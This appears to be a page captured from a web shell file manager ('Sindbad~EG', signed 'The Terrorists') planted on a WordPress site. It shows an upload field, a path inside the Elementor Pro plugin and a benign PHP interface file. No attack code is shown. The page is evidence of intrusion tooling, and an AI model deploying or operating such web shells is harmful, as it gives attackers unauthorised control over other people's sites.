Sindbad~EG File Manager

Current Path : /proc/self/cwd/wp-content/plugins/elementor-pro/core/data/interfaces/
Upload File :
Current File : //proc/self/cwd/wp-content/plugins/elementor-pro/core/data/interfaces/endpoint.php

<?php
namespace ElementorPro\Core\Data\Interfaces;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

interface Endpoint {
	/**
	 * @return string The interface ID
	 */
	public function get_name(): string;

	/**
	 * @return string The route slug which will be used to access the endpoint by URL.
	 */
	public function get_route(): string;
}

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists